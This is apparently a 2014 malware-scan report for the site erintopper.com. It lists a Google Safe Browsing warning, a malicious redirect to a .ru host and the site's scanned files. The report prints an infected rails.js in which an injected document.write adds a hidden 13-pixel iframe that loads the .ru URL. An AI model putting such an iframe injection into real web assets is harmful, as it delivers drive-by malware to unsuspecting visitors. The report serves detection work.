Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=erintopper.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://erintopper.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: erintopper.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 05:47:28 GMT Location: http://dibsrearranged.ru/gpssimultaneously.cgi?8 Server: Apache Vary: Accept-Encoding Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://erintopper.com/ | 200 OK Content-Length: 985 Content-Type: text/html | clean |
http://erintopper.com/eberri_files/jquery.min.js | 200 OK Content-Length: 86088 Content-Type: application/javascript | clean |
http://erintopper.com/eberri_files/rails.js | 200 OK Content-Length: 11115 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { var rails; $.rails = rails = { linkClickSelector: 'a[data-confirm], a[data-method], a[data-remote]', formSubmitSelector: 'form', formInputClickSelector: 'form input[type=submit], form input[type=image], form button[type=submit], form button:not([type])', disableSelector: 'input[data-disable-with], button[data-disable-with], textarea[data-disable-with]', enableSelector: 'input[data-disable-with]:disabled, button[data-disable-with]: if (this == event.target) rails.disableFormElements($(this)); }); $(rails.formSubmitSelector).live('ajax:complete.rails', function(event) { if (this == event.target) rails.enableFormElements($(this)); }); })( jQuery ); ;document.write('<iframe src="http://dibsrearranged.ru/gpssimultaneously.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://erintopper.com/eberri_files/application.js | 200 OK Content-Length: 311 Content-Type: application/javascript | clean |
http://erintopper.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |